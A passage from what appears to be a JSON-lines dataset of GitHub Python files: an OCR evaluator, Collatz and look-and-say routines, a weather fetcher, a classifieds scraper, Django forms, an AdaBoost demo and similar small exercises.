self.state_acc = self.state_right/self.state_all\n self.char_acc = self.char_acc_all / self.all\n self.all_recall = self.recall / self.all_num\n\n\n if self.equation_all == 0:\n self.equation_acc = 0\n else:\n self.equation_acc = self.equation_right/self.equation_all\n if self.bracket_all == 0:\n self.bracket_acc = 0\n else:\n self.bracket_acc = self.bracket_right/self.bracket_all\n if self.residual_all == 0:\n self.residual_acc = 0\n else:\n self.residual_acc = self.residual_right/self.residual_all\n\n\n self.evaluate_dict = {'all':self.seq_acc,'=':self.equation_acc,'()':self.bracket_acc,'...':self.residual_acc,'state':self.state_acc,'char_acc':\n self.char_acc,'recall':self.all_recall}\n\n\n def print_result(self):\n print('总共:{}道题,正确率:{}'.format(self.all,self.seq_acc))\n print('等式:{}道题,正确率:{}'.format(self.equation_all,self.equation_acc))\n print('填空题:{}道题,正确率:{}'.format(self.bracket_all,self.bracket_acc))\n print('求余数:{}道题,正确率:{}'.format(self.residual_all,self.residual_acc))\n print('判断对错的正确率{}'.format(self.state_acc))\n print('字符正确率{}'.format(self.char_acc))\n print('召回率{}'.format(self.all_recall))\n\n def write_result(self,log_path):\n log = open(log_path, 'a')\n log.writelines('总共:{}道题,正确率:{}\\n'.format(self.all, self.seq_acc))\n log.writelines('等式:{}道题,正确率:{}\\n'.format(self.equation_all, self.equation_acc))\n log.writelines('填空题:{}道题,正确率:{}\\n'.format(self.bracket_all, self.bracket_acc))\n log.writelines('求余数:{}道题,正确率:{}\\n'.format(self.residual_all, self.residual_acc))\n log.writelines('判断对错的正确率{}\\n'.format(self.state_acc))\n log.writelines('字符正确率{}\\n'.format(self.char_acc))\n log.writelines('召回率{}\\n'.format(self.all_recall))\n log.writelines('-------------------------------------------------------------------------------------------------------------\\n')\n\n\n\ndef json_to_result(json,img):\n all_result = json['questionImgs']\n json_result = Json_Result()\n for q_result in all_result:\n label = q_result['questionContext']\n bbox = [q_result['leftX'],q_result['topY'],q_result['leftX']+q_result['questionWidth'],q_result['topY']+q_result['questionHeight']]\n result = Result(bbox,img,'')\n result.output = label_replace(label)\n result.state = eval_label(result.output)\n json_result.connect_result.append(result)\n\n return json_result\n\n\n\n\n\ndef evaluate(save_path,log_path,xml_path, img_path,recog_path,recognition_xml):\n\n\n all_img = set_xml_data(xml_path, img_path,recog_path,recognition_xml)\n\n # sess1, sess2, net, run_list, dense_decoder, inputs, width, is_training, logits, sequence_length, decodes_greedy = create_sess()\n\n evaluate_data = Evaluate_Data()\n\n for i,true_result in enumerate(all_img):\n true_result.row_connect()\n img = true_result.img\n json = get_json_result(true_result.img_path)\n # pre_result, bboxes, types = pipeline(img.copy(), sess1, sess2, net, run_list, dense_decoder, inputs, width,\n # is_training, logits, sequence_length, decodes_greedy)\n bboxes = []\n types = []\n pre_result = json_to_result(json,img)\n single_img_evaluate = Single_Img_Evaluate(true_result,pre_result,img,true_result.name,save_path,'',bboxes, types)\n single_img_evaluate.get_pair()\n single_img_evaluate.statistic_data()\n single_img_evaluate.compute()\n single_img_evaluate.print_write_result(log_path)\n single_img_evaluate.draw_result()\n print('目前总共:')\n evaluate_data.add_data(single_img_evaluate)\n evaluate_data.compute()\n evaluate_data.print_result()\n print('------------------------------------------------------------------')\n\n evaluate_data.write_result(log_path)\n\n\nif __name__ == '__main__':\n save_path = '/home/wzh/第一批/val的验证' #保存的地址\n log_path = 'log.txt' #结果的log文件夹\n xml_path = '/home/wzh/第一批/img_val_xml' #验证集检测标注的文件夹\n img_path = '/home/wzh/第一批/img_val' #验证集的图片文件夹\n recog_path = '/home/wzh/第一批/suanshi_val' #验证集的识别标注文件夹\n recognition_xml = 'outputs' #验证集识别xml文件夹的名称\n\n\n\n\n # #第五批------------------------------------------------------------------------------------------------------\n # save_path = os.environ['HOME']+'/第五批-测试集/第五批测试集-检验'\n # log_path = os.environ['HOME']+'/第五批-测试集/第五批测试集-检验/log.txt'\n # xml_path = os.environ['HOME']+'/第五批-测试集/第五批测试集/生成的xml文件'\n # img_path = os.environ['HOME']+'/第五批-测试集/第五批测试集/原始图片'\n # recog_path = os.environ['HOME']+'/第五批-测试集/第五批测试集识别图-result'\n # recognition_xml = 'xml'\n\n\n evaluate(save_path,log_path,xml_path, img_path,recog_path,recognition_xml)","repo_name":"wwzzhh063/ocr","sub_path":"evaluate_data.py","file_name":"evaluate_data.py","file_ext":"py","file_size_in_byte":16186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11737356628","text":"#!/usr/bin/python3\n\n# =============================================================================\n# An implementation of the Syracuse algorithm in Python. Cleaned it up after\n# trying the same in Ruby, using this for reference. The old one wasn't as\n# smart in its operations, it used string concatenation and frequent conversion\n# to integers. For example, it did not previously use integer division!\n# =============================================================================\n\n\ndef syracuse(number, max_iter=100):\n number = int(number)\n max_iter = int(max_iter)\n sequence = []\n sequence.append(number)\n for i in range(0, max_iter + 1):\n if sequence[-1] == 1: # Could be: sequence[-1] in [4, 2, 1]\n print(\n \"\\n Sequence repeats!\\n\\n\"\n \"Number of iterations: %s\\n\"\n \"Sequence:\\n%s\"\n % (i, sequence)\n )\n return sequence\n if (sequence[i] % 2) == 1:\n sequence.append(3 * sequence[i] + 1)\n if (sequence[i] % 2) == 0:\n sequence.append(sequence[i] // 2)\n if i == max_iter - 1:\n print(\n \"\\n Reached max. iterations!\\n\\n\"\n \"Sequence:\\n%s\"\n % sequence\n )\n return sequence\n","repo_name":"glm729/code-examples","sub_path":"src/python/syracuse.py","file_name":"syracuse.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"74246611412","text":"from src.pages.Python.HomePage import HomePage\r\n\r\ndef test_downloads_android(browser,config):\r\n #GIVEN: Linguoo homepage.\r\n #WHEN: User clicks \"Android\" button (at the headder)\r\n #THEN: Go to playstore, linguoo app.\r\n\r\n #WHEN: User clicks on \"Play Store\" button (at the downloads section)\r\n #THEN: Go to plastore, linguoo app.\r\n\r\n homepage=HomePage(browser,config)\r\n homepage.load()\r\n\r\n playstorepage=homepage.click_android_button()\r\n url=playstorepage.return_url()\r\n\r\n assert url==config[\"playstore-url\"]\r\n\r\n homepage.load()\r\n\r\n url=homepage.click_playstore_button()\r\n\r\n assert url==config[\"playstore-url\"]\r\n ","repo_name":"Yiulius13/Linguoo-Page-QA","sub_path":"src/tests/Python/test_downloads_android.py","file_name":"test_downloads_android.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2818796205","text":"def get_real_j_val(i, j):\n return 1 + i + j\n\ndef get_idx_j_val(i, real_j):\n return real_j - i - 1\n\ndef fulfill_terms(value):\n return (value > 0 and value <= 0.5)\n\ndef semantic_graph_modification(individual, graph_docs, corpus_pas):\n for node1, node2, data in graph_docs.edges(data=True):\n weight_features_node1 = ((individual[0] * corpus_pas[node1].fst_feature) + (individual[1] * corpus_pas[node1].position_feature) +\n (individual[2] * corpus_pas[node1].p2p_feature) + (individual[3] * corpus_pas[node1].tfidf_feature)\n + (individual[4] * corpus_pas[node1].length_feature) + (individual[5] * corpus_pas[node1].pnoun_feature) + (individual[6] * corpus_pas[node1].num_feature) + \n (individual[7] * corpus_pas[node1].noun_verb_feature) + (individual[8] * corpus_pas[node1].temporal_feature) + (individual[9] * corpus_pas[node2].location_feature))\n weight_features_node2 = ((individual[0] * corpus_pas[node2].fst_feature) + (individual[1] * corpus_pas[node2].position_feature) +\n (individual[2] * corpus_pas[node2].p2p_feature) + (individual[3] * corpus_pas[node2].tfidf_feature)\n + (individual[4] * corpus_pas[node2].length_feature) + (individual[5] * corpus_pas[node2].pnoun_feature) + (individual[6] * corpus_pas[node2].num_feature) + \n (individual[7] * corpus_pas[node2].noun_verb_feature) + (individual[8] * corpus_pas[node2].temporal_feature) + (individual[9] * corpus_pas[node2].location_feature))\n data['weight'] = data['initial_weight'] * ((0.5 * weight_features_node1) + (0.5 * weight_features_node2))\n\n # fill sum weight\n for node in graph_docs.nodes:\n graph_docs.node[node]['sum_weight'] = sum(graph_docs[node][link]['weight'] for link in graph_docs[node])\n\nclass GraphAlgorithm:\n def __init__(self, graph, threshold=0.0001, dp=0.85, init=1.0, max_iter=100):\n self.__graph = graph\n self.__threshold = threshold\n self.__dp = dp\n self.__iteration = 0\n self.__init = init\n self.__max_iter = max_iter\n \n def init_graph(self):\n for node in self.__graph.nodes:\n self.__graph.node[node][self.__iteration] = self.__init\n\n def run_algorithm(self):\n keep_iteration = True\n self.__iteration = 0\n self.init_graph()\n \n for _ in range(self.__max_iter):\n self.__iteration += 1\n # print(self.__iteration)\n all_below_threshold = True\n for node in self.__graph.nodes:\n dp_multiplier = 0.0\n for neighbor in self.__graph[node]:\n # neighbor's outgoing links\n if (self.__graph.node[neighbor]['sum_weight'] > 0):\n dp_multiplier += (self.__graph.node[neighbor][self.__iteration - 1] * self.__graph[node][neighbor]['weight'])/self.__graph.node[neighbor]['sum_weight']\n else:\n dp_multiplier += (self.__graph.node[neighbor][self.__iteration - 1] * self.__graph[node][neighbor]['weight'])\n self.__graph.node[node][self.__iteration] = (1 - self.__dp) + (self.__dp * dp_multiplier)\n # if (abs(self.__graph.node[node][self.__iteration] - self.__graph.node[node][self.__iteration - 1]) >= self.__threshold):\n # all_below_threshold = False\n\n err = sum(abs(self.__graph.node[node][self.__iteration] - self.__graph.node[node][self.__iteration - 1]) for node in self.__graph.nodes) \n if err < (len(self.__graph.nodes) * self.__threshold):\n break\n # keep_iteration = False\n # if (all_below_threshold):\n # keep_iteration = False\n\n def get_num_iter(self):\n return self.__iteration\n \n def get_trained_graph(self):\n return self.__graph\n","repo_name":"crahels/alphasummarizer","sub_path":"summarizer/modules/algorithms/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"9668824778","text":"from typing import Any, List\nfrom dataclasses import dataclass\nimport os\nimport time\n\nimport requests\nimport xmltodict\n\n\n@dataclass\nclass Weather:\n temperature: float\n condition: str\n condition_icon: str # corresponds to an icon image file in static/images/\n forecasts: List[Any]\n\n @classmethod\n def parse(cls, xmldict) -> \"Weather\":\n temperature = float(\n xmldict[\"siteData\"][\"currentConditions\"][\"temperature\"][\"#text\"]\n )\n condition = xmldict[\"siteData\"][\"currentConditions\"][\"condition\"]\n condition_icon = xmldict[\"siteData\"][\"currentConditions\"][\"iconCode\"][\"#text\"]\n\n raw_forecasts = xmldict[\"siteData\"][\"forecastGroup\"][\"forecast\"][0:3]\n forecasts = [\n (\n x[\"abbreviatedForecast\"][\"textSummary\"],\n x[\"abbreviatedForecast\"][\"iconCode\"][\"#text\"],\n x[\"temperatures\"][\"textSummary\"],\n )\n for x in raw_forecasts\n ]\n\n return Weather(\n temperature=temperature,\n condition=condition,\n condition_icon=condition_icon,\n forecasts=forecasts,\n )\n\n\ndef fetch(force=False):\n cache = \"latest.xml\"\n\n if force or is_old(cache):\n print('fetching fresh...')\n response = requests.get(\n \"https://dd.weather.gc.ca/citypage_weather/xml/ON/s0000430_e.xml\"\n )\n response.raise_for_status()\n content = response.text\n with open(cache, \"w\", encoding=\"latin-1\") as file:\n file.write(content)\n else:\n print('using cache')\n with open(cache, \"r\", encoding=\"latin-1\") as file:\n content = file.read()\n\n\n return Weather.parse(xmltodict.parse(content))\n\ndef is_old(path) -> bool:\n fifteen_minutes = 60 * 15\n return (time.time() - os.path.getmtime(path)) > fifteen_minutes","repo_name":"tahnok/walter","sub_path":"server/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30489233649","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport csv\nimport requests\nimport pandas as pd\nfrom time import sleep\nimport io\n\nheaders = {\n 'User-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36',\n 'Accept-Language' : 'en-US, en;q=0.5'\n}\narama = input(\"Aramak istediğiniz şey nedir?:\")\nsearch_query = arama.replace(' ', '+')\nurl = 'https://www.sahibinden.com/kelime-ile-arama?query_text={0}'.format(search_query)\nresponse = requests.get(url, headers = headers, allow_redirects=False)\nmy_soup = BeautifulSoup(response.content, 'html.parser')\nresults = str(my_soup.find_all('title'))\n\nitems = []\ndef deneme(url):\n num_pages = 100\n for page in range(0, num_pages + 1):\n url_3 = f'https://www.sahibinden.com' + url + \"&pagingOffset={0}\".format(str(page * 20))\n print(url_3)\n response_2 = requests.get(url_3, headers=headers)\n print(response_2.status_code)\n if(response_2.status_code==429):\n print(\"fazla istek\")\n sleep(10)\n print(\"timeout\")\n continue\n my_soup_1 = BeautifulSoup(response_2.content, 'html.parser')\n\n listings = my_soup_1.find_all('tr', {'class': 'searchResultsItem'})\n denek2 = my_soup_1.find(\"tbody\",{\"class\":\"searchResultsRowClass\"})\n denek3 = denek2.find_all(\"tr\",{\"class\":\"searchResultsItem\"})\n def my_arr(data):\n return data.text\n for dene in denek3 :\n try:\n no = dene[\"data-id\"]\n price_elem = dene.find('td', {'class': 'searchResultsPriceValue'}).find(\"span\").text\n print(price_elem)\n product_elem = dene.find('a', {'class': 'classifiedTitle'}).text.strip()\n date_elem = dene.find('td', {'class': 'searchResultsDateValue'}).find_all(\"span\")\n arr_map = list(map(my_arr,date_elem))\n arr_join =(\" \").join(arr_map)\n location_elem = dene.find('td', {'class': 'searchResultsLocationValue'}).text.strip() # buraya bak\n row = {\n 'Price': price_elem,\n 'Product Name': product_elem,\n 'Date': arr_join,\n 'Location': location_elem,\n 'ID': no\n }\n items.append(row)\n print(row)\n\n df = pd.DataFrame(items, columns=['Price', 'Product Name', 'Date', 'Location', 'ID'])\n df.to_csv('{0}.csv'.format(search_query), index=False, encoding='utf-8-sig')\n\n except AttributeError:\n continue\n except KeyError:\n continue\n\nprint(response.status_code)\nif (response.status_code==200):\n\n\n my_soup1 = my_soup.find_all('div',class_= 'category-top-level')\n\n for category in my_soup1:\n name = category.a.text.strip()\n count = int(category.a.strong.span.text.strip().replace(',', ''))\n my_list = category.a['href'].split(\"&\")\n try:\n category_id = list(filter(lambda x: x.startswith('category='), my_list))[0].split('=')[1]\n print(name.replace(str(count),\"\").replace(\"ilan\",\" \"), count,\"...tane ilan var.\" , \"ID: \" , category_id)\n\n except IndexError:\n print(\"hata\")\n Id = input(\"Kategori ID seç:\")\n\n url_2 = 'https://www.sahibinden.com/kelime-ile-arama-yonlendir?disableEstimation=false&category={0}&query_text={1}'.format(str(Id),search_query)\n\n response_2 = requests.get(url_2, headers=headers, allow_redirects=False)\n redirect = response_2.headers['Location']\n print(redirect)\n my_soup_1 = BeautifulSoup(response_2.content, 'html.parser')\n\n listings = my_soup_1.find_all('tr', {'class': 'searchResultsItem'})\n\n deneme(redirect)\n\nelif(response.status_code==301):\n print(response)\n redirect = response.headers['Location']\n deneme(redirect)\n\nelse:\n print(\"hata\",response.status_code)\n\n\n\n#with io.open('{0}.csv'.format(search_query), mode='w', newline='', encoding='utf-8') as file:\n\n# writer = csv.DictWriter(file, fieldnames=['Price', 'Product Name', 'Date', 'Location', 'ID'])\n # writer.writeheader()\n # writer.writerows(items)\n\n\n\n","repo_name":"Tamayerd/WebScraping","sub_path":"sahibinden.py","file_name":"sahibinden.py","file_ext":"py","file_size_in_byte":4230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"12719077513","text":"from functools import partial\nfrom pathlib import Path\nfrom typing import Optional\nimport click\nfrom tsbench.analysis.utils import num_fitting_processes, run_parallel\nfrom tsbench.config import DATASET_REGISTRY\nfrom tsbench.constants import DEFAULT_DATA_PATH\nfrom ._main import datasets\n\n\n@datasets.command(short_help=\"Download and preprocess datasets.\")\n@click.option(\n \"--dataset\",\n type=str,\n default=None,\n help=(\n \"The dataset to compute basic statistics for. \"\n \"If not provided, computes statistics for all datasets.\"\n ),\n)\n@click.option(\n \"--path\",\n type=str,\n default=DEFAULT_DATA_PATH,\n show_default=True,\n help=\"The path where the datasets should be downloaded to.\",\n)\ndef download(dataset: Optional[str], path: str):\n \"\"\"\n Downloads and preprocesses either a single dataset or all datasets in the\n registry.\n \"\"\"\n base = Path(path)\n\n if dataset is not None:\n dataset_cls = DATASET_REGISTRY[dataset](base)\n dataset_cls.generate()\n dataset_cls.prepare()\n return\n\n # Start off by downloading an M3 dataset\n dataset_cls = DATASET_REGISTRY[\"m3_monthly\"](base)\n dataset_cls.generate()\n dataset_cls.prepare()\n\n # Then, we can download the rest in parallel (by preloading, we don't download the M3 data in\n # parallel)\n run_parallel(\n partial(_download_dataset, base=base),\n list(DATASET_REGISTRY.keys()),\n num_processes=min(\n num_fitting_processes(cpus_per_process=1, memory_per_process=8),\n len(DATASET_REGISTRY),\n ),\n )\n\n\ndef _download_dataset(name: str, base: Path):\n dataset_cls = DATASET_REGISTRY[name](base)\n dataset_cls.generate()\n dataset_cls.prepare()\n","repo_name":"awslabs/gluonts","sub_path":"src/gluonts/nursery/tsbench/src/cli/datasets/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":3904,"dataset":"github-code","pt":"67"} +{"seq_id":"74794894292","text":"from time import time\n\nimport numpy as np\nfrom AdaBoost import AdaBoost\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\n\n# Wczytanie danych\ndata = np.loadtxt('data.txt', delimiter=\",\")\ndat = data[:, 0:13]\n\nlearning = np.loadtxt('learning.txt', delimiter=\",\")\nlrn = learning[:, 8]\n\n# Podział i przygotowanie danych\ntrainingParameters, testingParameters, trainingOutcome, testingOutcome = train_test_split(dat, lrn, test_size=0.3)\n\ntrainingParameters = trainingParameters.transpose()\ntrainingOutcome[trainingOutcome == 1] = 1\ntrainingOutcome[trainingOutcome == 0] = -1\n\ntestingParameters = testingParameters.transpose()\ntestingOutcome[testingOutcome == 1] = 1\ntestingOutcome[testingOutcome == 0] = -1\n\n# Zastosowanie algorytmu\nadaBoost = AdaBoost(trainingParameters, trainingOutcome)\nstart = time()\nadaBoost.simulate(10)\nend = time()\ntimeElapsed = end - start\n\n# Estymacja\noutcomeEstimation = adaBoost.estimate(testingParameters)\n\nprint(f\"Czas dzialania algorytmu: {timeElapsed} s\")\nprint (\"Estymacja:\", len(outcomeEstimation[outcomeEstimation == testingOutcome]))\nprint (\"Precyzja:\", accuracy_score(testingOutcome, outcomeEstimation))\n\n","repo_name":"dam1508/PSZT-Projekt2","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15125188434","text":"import json\n\ndef printData(data):\n for d in data:\n print(\"_________________________________\")\n for key,value in d.items():\n print(\"{}\\t{}\".format(key,value))\n\nfileName = 'json/myJsonFile.json'\ndata = []\ntry:\n with open(fileName) as f:\n data = json.load(f)\nexcept:\n print(\"No specific file\")\nelse:\n print(\"All your json data:\")\n printData(data)\n\ndef saveData(data):\n with open(fileName, 'w') as json_file:\n json.dump(data, json_file)\n\nwhile True:\n inputData = input(\"What you want to do - Add data (+), quit program (q) or delete all data (-),show all data (*)\\n\")\n if(inputData == \"q\"):\n print(\"See you soon\")\n break\n if (inputData == \"-\"):\n data = []\n print(\"All data removed\")\n saveData(data)\n continue\n if (inputData == \"*\"):\n printData(data)\n saveData(data)\n continue\n if (inputData == \"+\"):\n print(\"Specyfy your car:\")\n brand = input(\"Brand \\n\")\n color = input(\"Color \\n\")\n price = input(\"Price \\n\")\n height = input(\"Height \\n\")\n newData = {\"Brand\":brand,\"Color\":color,\"Price\":price,\"Height\":height}\n data.append(newData)\n saveData(data)\n\n continue\n print(\"Wrong command\")\n\nsaveData(data)","repo_name":"Mopiel/Python-Linux","sub_path":"18_JSON.py","file_name":"18_JSON.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"712453501","text":"from django import forms\nfrom pruebas.models import Productos, Paises, Periodos\n\n\nclass FormProductos(forms.ModelForm):\n #nombre=forms.ModelChoiceField(queryset=Productos.objects.values_list('nombre', flat=True).distinct(), label='')\n nombre=forms.ModelChoiceField(queryset=None, label=\"\", empty_label='Seleccione un Plan', required=False)\n \n class Meta:\n model=Productos\n fields=['nombre']\n labels={'nombre':''}\n\n\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'js-example-basic-single',\n 'style':'width: 300px;'\n\n })\n self.fields['nombre'].queryset=Productos.objects.values_list('nombre', flat=True).distinct()\n\nclass FormPeriodos(forms.ModelForm):\n periodo=forms.ModelChoiceField(queryset=Periodos.objects.all(), label='', empty_label='Seleccione un periodo',required=False)\n \n \n class Meta:\n model=Periodos\n fields=['periodo']\n labels={'periodo':''}\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'js-example-basic-single',\n 'style':'width: 300px;'\n \n })\n\nclass FormPaises(forms.ModelForm):\n pais=forms.ModelChoiceField(queryset=Paises.objects.all(), label='', empty_label='Seleccione un pais',required=False)\n \n \n class Meta:\n model=Paises\n fields=['pais']\n labels={'pais':''}\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'js-example-basic-single',\n 'style':'width: 300px;'\n \n })\n\nclass FormCreate(forms.ModelForm):\n #Lista_periodos=[('0','Seleccione un periodo'),('Mensual','Mensual'),('Trimestral','Trimestral'),('Semestral','Semestral'),('Anual','Anual'),('Bianual','Bianual'),('5 años','5 años')]\n #Lista_paises=[('0','Seleccione un país'),('Argentina','Argentina'),('Venezuela','Venezuela'),('Chile','Chile'),('Uruguay','Uruguay'),('Peru','Peru')]\n #Lista_id=[('Mensual','1 - Mensual'),('Trimestral','2 - Trimestral'),('Semestral','3 - Semestral'),('Anual','4 - Anual'),('Bianual','5 - Bianual'),('5 años','6 - 5años')]\n \n #pais=forms.ChoiceField(choices=(Lista_paises), label='Residencia',initial='Seleccione un país')\n #periodo=forms.ChoiceField(choices=(Lista_periodos), label='Periodo de pago', initial='Seleccione un periodo')\n #id_periodo=forms.ChoiceField(choices=(Lista_id), label='ID Periodo de pago', initial='Seleccione ID correspondiente')\n \n \n #pais=forms.ModelChoiceField(queryset=Productos_Arg.objects.values_list('pais', flat=True).distinct('pais'), label='Residencia', to_field_name=\"pais\", empty_label='Seleccione un país')\n #id_periodo=forms.ModelChoiceField(queryset=Productos_Arg.objects.values_list('id_periodo', flat=True).distinct('id_periodo'), label='ID periodo de pago', to_field_name=\"id_periodo\", empty_label='Seleccione un ID')\n #periodo=forms.ModelChoiceField(queryset=Productos_Arg.objects.values_list('periodo', flat=True).order_by('id_periodo').distinct('id_periodo'), empty_label='Seleccione un periodo')\n #peroido=forms.TextInput(attrs={'readonly':'readonly'})\n \n periodo=forms.ModelChoiceField(queryset=Periodos.objects.all(), empty_label='Seleccione un periodo', label='')\n pais=forms.ModelChoiceField(queryset=Paises.objects.all(),empty_label='Seleccione un pais',label='')\n descripcion=forms.CharField(widget=forms.Textarea(attrs={'placeholder':'Escriba la descripcion del producto'}), label='')\n\n \n class Meta:\n model=Productos\n\n fields=['nombre','periodo','pais','descripcion','PrecioCompra','PrecioRenovacion']\n labels={\n 'nombre':'',\n 'PrecioCompra':'',\n 'PrecioRenovacion':'',\n 'descripcion':'',\n }\n\n\n def __init__(self,*args,**kwars):\n super().__init__(*args,**kwars)\n for field in iter(self.fields):\n \n self.fields[field].widget.attrs.update({\n 'class':'form-control',\n \n })\n self.fields['nombre'].widget.attrs.update({\n 'placeholder':'Escriba nombre del plan'})\n self.fields['PrecioCompra'].widget.attrs.update({\n 'placeholder':'Escriba precio de compra'})\n self.fields['PrecioRenovacion'].widget.attrs.update({\n 'placeholder':'Escriba precio de renovacion'})\n\n\n \n\n ","repo_name":"jmf-informatica/Proyecto-Django-2","sub_path":"mytestsite/pruebas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4518437729","text":"import sqlite3\nimport os\n\n#open weather map client wrapper\nimport pyowm\nimport time\n\n#imports the variables from the config.py file\nfrom config import *\n\n#create the data directory if it doesn't exist\nif not os.path.exists('data'):\n os.makedirs('data')\n\n#create the db in the data directory\ndb = sqlite3.connect('data/weatherdb')\n\n# Get a cursor object and create the table\ncursor = db.cursor()\ncursor.execute('''\n CREATE TABLE IF NOT EXISTS users(time_stamp INTEGER,\n weather_code INTEGER)\n''')\ndb.commit()\n\n#defines the weather object\nowm = pyowm.OWM(API_KEY)\n\nwhile True:\n\n #pulls a time stamp\n now_stamp = int(time.time())\n #print(\"now_stamp = \" + str(now_stamp))\n\n #pulls the weather data\n observation = owm.weather_at_id(4033936)\n w = observation.get_weather()\n condition = int(w.get_weather_code())\n #print(\"condition = \" + str(condition))\n\n #writes the time stamp and weather data into the db\n cursor.execute('''INSERT INTO users(time_stamp, weather_code)\n VALUES(?,?)''', (now_stamp,condition))\n print(\"now_stamp = \" + str(now_stamp) + \" condition = \" + str(condition) + \" to db\")\n db.commit()\n\n #sets the database cutoff at everyting more than 3 minutes old\n db_cutoff = now_stamp - 180\n print(\"db_cutoff = \" + str(db_cutoff))\n\n #removes the old entries\n #and yes that comma afer db_cutoff is necessary\n cursor.execute('''DELETE FROM users WHERE time_stamp < ? ''', (db_cutoff,))\n db.commit()\n\n time.sleep(10)\n","repo_name":"mwweinberg/weather_cloud","sub_path":"weatherdb.py","file_name":"weatherdb.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37665408515","text":"import datetime\n\nfrom sqlalchemy.schema import Column\nfrom sqlalchemy.types import Integer\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.types import Float\nBase = declarative_base()\n\nclass Muestras(Base):\n __tablename__ = 'muestras'\n id=Column(Integer, primary_key=True)\n pasos=Column('pasos', Integer)\n distancia=Column('distancia', Float)\n calorias=Column('calorias', Float)\n velocidad=Column('velocidad', Float)\n \n def __init__(self,pasos,distancia,calorias,velocidad):\n self.pasos=pasos\n self.distancia=distancia\n self.calorias=calorias\n self.velocidad=velocidad\n\n ","repo_name":"jefferson556/podometro","sub_path":"www/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20421965211","text":"import json\n\n# Знайти найуспішнішого менеджера за підсумковою сумою продажів.\n# Як відповідь потрібно через пробыл вказати спершу його ім'я, потім прізвище і після загальну суму його продажів.\n# Файл manager_sales.json\n\nwith open('manager_sales.json', 'r') as json_file:\n sales = json.load(json_file)\n\nmax_sales = 0\nbest_manager_name = ''\nbest_manager_surname = ''\n\nfor manager in sales:\n manager_name = manager['manager']['first_name']\n manager_surname = manager['manager']['last_name']\n sum_of_sales = sum([car['price'] for car in manager['cars']])\n if sum_of_sales > max_sales:\n max_sales = sum_of_sales\n best_manager_name = manager_name\n best_manager_surname = manager_surname\n\nprint(f'{best_manager_name} {best_manager_surname} {max_sales}')","repo_name":"olenaruda/ithillel-python-qa","sub_path":"Lesson_9_100523/Homework_9/second_task.py","file_name":"second_task.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23231632483","text":"#Kajetan Mieloch grupa 3 zadanie 2 z listy 6\r\n\r\ndef popaSeISeNapisz(n, poczWart = 1):\r\n\r\n #Działa tylko dla cyfr\r\n if poczWart > 9:\r\n return \"Początkowa wartość musi być mniejsza niż 10\"\r\n\r\n #ustalamy początkowe wartości\r\n poczWart = str(poczWart)\r\n if (n == 1):\r\n return poczWart\r\n if (n == 2):\r\n return \"1\"+poczWart\r\n podst = \"1\"+poczWart\r\n #używamy znaku| żeby rozdzielić kolejne liczby ciągu\r\n for i in range(3, n + 1):\r\n podst += '|'\r\n l = len(podst)\r\n tempNumb = 1\r\n tmp = \"\"\r\n #sprawdzamy czy stojące obok liczby są torżsame\r\n for j in range(1 , l):\r\n if (podst[j] != podst[j - 1]):\r\n tmp += str(tempNumb + 0)\r\n tmp += podst[j - 1]\r\n tempNumb = 1\r\n else:\r\n tempNumb += 1\r\n podst = tmp\r\n return podst;\r\n\r\nn = 5\r\nprint(popaSeISeNapisz(n, 7))\r\n","repo_name":"KajetanMieloch/PythonExercises","sub_path":"Python List 6/zad3Lista6.py","file_name":"zad3Lista6.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"22996459370","text":"class Solution:\n def alienOrder(self, words):\n adj = {}\n for word in words:\n for c in word:\n if c not in adj:\n adj[c] = set()\n\n for i in range(len(words) - 1):\n w1, w2 = words[i], words[i + 1]\n minLen = min(len(w1), len(w2))\n if len(w1) > len(w2) and w1[:minLen] == w2[:minLen]:\n return \"\"\n for j in range(minLen):\n if w1[j] != w2[j]:\n adj[w1[j]].add(w2[j])\n break\n\n visit = {} # False = visited , True = current path\n res = 